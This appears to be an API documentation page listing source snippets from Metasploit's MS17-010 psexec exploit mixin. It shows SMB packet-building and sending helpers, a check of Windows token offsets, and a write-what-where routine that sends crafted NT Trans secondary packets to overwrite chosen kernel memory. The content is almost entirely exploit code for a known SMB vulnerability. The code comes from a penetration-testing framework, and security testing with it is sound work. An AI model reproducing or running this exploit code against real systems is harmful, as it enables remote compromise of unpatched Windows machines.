1136
1137
1138
1139
1140
1141
|
# File 'lib/msf/core/exploit/remote/smb/client/psexec_ms17_010.rb', line 1115
def (pkt, tid: nil, uid: nil, pid: nil, mid: nil)
self.simple.client.smb_defaults(pkt['Payload']['SMB'])
pkt['Payload']['SMB'].v['MultiplexID'] = if mid != nil then mid else next_multiplex_id() end
if uid != nil
pkt['Payload']['SMB'].v['UserID'] = uid
end
if tid != nil
pkt['Payload']['SMB'].v['TreeID'] = tid
end
if pid != nil
pkt['Payload']['SMB'].v['ProcessID'] = pid
end
pkt['Payload']['SMB'].v['Flags1'] = 0x18
pkt['Payload']['SMB'].v['Flags2'] = if self.simple.client.require_signing then 0x4807 else 0x4801 end
pkt
end
|
#smb_send_recv_raw(raw) ⇒ Object
902
903
904
905
906
907
908
909
910
|
# File 'lib/msf/core/exploit/remote/smb/client/psexec_ms17_010.rb', line 902
def smb_send_recv_raw(raw)
self.simple.client.smb_send(raw)
data = self.simple.client.smb_recv()
pkt = CONST::SMB_BASE_PKT.make_struct
pkt.from_s(data)
pkt
end
|
#validate_token_offset(tokenData, userAndGroupCountOffset, userAndGroupsAddrOffset) ⇒ Object
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
|
# File 'lib/msf/core/exploit/remote/smb/client/psexec_ms17_010.rb', line 170
def validate_token_offset(tokenData, userAndGroupCountOffset, userAndGroupsAddrOffset)
userAndGroupCount, restrictedSidCount = tokenData[userAndGroupCountOffset..-1].unpack('VV')
userAndGroupsAddr, restrictedSids = tokenData[userAndGroupsAddrOffset..-1].unpack(@ctx['PTR_FMT']*2)
if datastore['DBGTRACE']
print_status("userAndGroupCount: 0x#{userAndGroupCount.to_s(16)}")
print_status("userAndGroupsAddr: 0x#{userAndGroupsAddr.to_s(16)}")
print_status("RestrictedSids: 0x#{restrictedSids.to_s(16)}")
print_status("RestrictedSidCount: 0x#{restrictedSidCount.to_s(16)}")
end
success = true
if restrictedSidCount != 0 or restrictedSids != 0 or userAndGroupCount == 0 or userAndGroupsAddr == 0
print_error('Bad TOKEN_USER_GROUP offsets detected while parsing tokenData!')
success = false
end
return success, userAndGroupCount, userAndGroupsAddr
end
|
#write_what_where(what, where) ⇒ Object
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
|
# File 'lib/msf/core/exploit/remote/smb/client/psexec_ms17_010.rb', line 236
def write_what_where(what, where)
if where == 0
raise MS17_010_Error, 'Attempted to write to a NULL pointer!'
end
pkt = create_nt_trans_secondary_packet(mid: @ctx['trans1_mid'],
data: [where].pack(@ctx['PTR_FMT']),
dataDisplacement: @ctx['TRANS_INDATA_OFFSET'])
self.simple.client.smb_send(pkt.to_s)
do_smb_echo()
pkt = create_nt_trans_secondary_packet(mid: @ctx['trans2_mid'], data: what)
self.simple.client.smb_send(pkt.to_s)
do_smb_echo()
end
|